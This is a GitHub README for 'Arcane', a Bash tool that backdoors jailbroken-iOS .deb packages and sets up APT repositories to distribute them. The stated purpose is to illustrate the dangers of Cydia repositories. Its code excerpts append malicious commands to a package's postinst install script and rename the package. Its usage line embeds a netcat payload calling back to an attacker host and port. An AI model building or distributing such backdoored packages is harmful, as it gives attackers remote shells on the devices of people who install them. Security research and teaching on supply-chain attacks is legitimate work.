- Notifications
You must be signed in to change notification settings - Fork28
tokyoneon/Arcane
Folders and files
| Name | Name | Last commit message | Last commit date | |
|---|---|---|---|---|
Repository files navigation
Arcane is a simple script designed to backdoor iOS packages (iphone-arm) and create the necessary resources for APT repositories. It was created forthis publication to help illustrate why Cydia repositories can be dangerous and what post-exploitation attacks are possible from a compromised iOS device.
To understand what's happening in the GIF, decompress a package created with Arcane.
dpkg-deb -R /tmp/cydia/whois_5.3.2-1_iphoneos-arm_BACKDOORED.deb /tmp/whois-decompNotice thecontrol andpostinst files in theDEBIAN directory. Both files are important.
tree /tmp/whois-decomp//tmp/whois-decomp/├── DEBIAN│ ├── control│ └── postinst└── usr └── bin └── whoisIt's possible to supply scripts as part of a package when installing or removing applications.Package maintainer scripts include thepreinst, postinst, prerm, and postrm files. Arcane takes advantage of thepostinst file to execute commands during the installation.
# The "post-installation" file. This file is generally responsible# for executing commands on the OS after installing the required# files. It's utilized by developers to manage and maintain various# aspects of an installation. Arcane abuses this functionality by# appending malicious Bash commands to the file.postinst="$tmp/DEBIAN/postinst";# A function to handle the type of command execution embedded into the# postinst file.functioninject_backdoor (){# If --file is used, `cat` the command(s) into the postinst file.if [["$infile" ]];then cat"$infile">>"$postinst"; embed="[$infile]";else# If no --file, utilize the simple Bash payload, previously# defined.echo -e"$payload">>"$postinst"; embed="generic shell command";fi; status"embedded$embed into postinst""error embedding backdoor"; chmod 0755"$postinst"};
Thecontrol file contains values that package management tools use when installing packages. Arcane will either modify an existingcontrol or create it.
# The "control" file template. Most iOS packages will include a# control file. In the event one is not found, Arcane will use the# below template. The `$hacker` variable is used here to occupy# various arbitrary fields.# https://www.debian.org/doc/manuals/maint-guide/dreq.en.htmlcontrolTemp="Package: com.$hacker.backdoorName:$hacker backdoorVersion: 1337Section: appArchitecture: iphoneos-armDescription: A backdoored iOS packageAuthor:$hacker <https://$hacker.github.io/>Maintainer:$hacker <https://$hacker.github.io/>";...# An `if` statement to check for the control file.if [[!-f"$tmp/DEBIAN/control" ]];then# If no control is detected, create it using the template.echo"$controlTemp">"$tmp/DEBIAN/control"; status"created control file""error with control template";else# If a control file exists, Arcane will simply rename the package# as it appears in the list of available Cydia applications. This# makes the package easier to location in Cydia. msg"detected control file" succ; sed -i'0,/^Name:.*/s//Name: $hacker backdoor/'"$tmp/DEBIAN/control"; status"modified control file""error with control";fi;
Clone the repository in Kali v2020.3.
sudo apt-get update; sudo apt-get install -Vy bzip2 netcat-traditional dpkg coreutils # dependenciessudo git clone https://github.com/tokyoneon/arcane /opt/arcanesudo chown $USER:$USER -R /opt/arcane/; cd /opt/arcanechmod +x arcane.sh;./arcane.sh --helpEmbed a command into a given package. Seearticle for more info.
./arcane.sh --input samples/sed_4.5-1_iphoneos-arm.deb --lhost <attacker> --lport <4444> --cydia --netcatThe repo includes packages for testing.
ls -la samples/-rw-r--r-- 1 root root 100748 Jul 17 18:39 libapt-pkg-dev_1.8.2.1-1_iphoneos-arm.deb-rw-r--r-- 1 root root 142520 Jul 22 06:21 network-cmds_543-1_iphoneos-arm.deb-rw-r--r-- 1 root root 76688 Aug 29 2018 sed_4.5-1_iphoneos-arm.deb-rw-r--r-- 1 root root 60866 Jul 8 21:03 top_39-2_iphoneos-arm.deb-rw-r--r-- 1 root root 13810 Aug 29 2018 whois_5.3.2-1_iphoneos-arm.debMD5 sums, as found on the officialBingner repository.
md5sum samples/*.deb3f1712964701580b3f018305a55e217c samples/libapt-pkg-dev_1.8.2.1-1_iphoneos-arm.deb795ccf9c6d53dd60d2f74f7a601f474f samples/network-cmds_543-1_iphoneos-arm.deba020882dac121afa4b03c63304d729b0 samples/sed_4.5-1_iphoneos-arm.deb38db275007a331e7ff8899ea22261dc7 samples/top_39-2_iphoneos-arm.debb40ee800b72bbac323568b36ad67bb16 samples/whois_5.3.2-1_iphoneos-arm.deb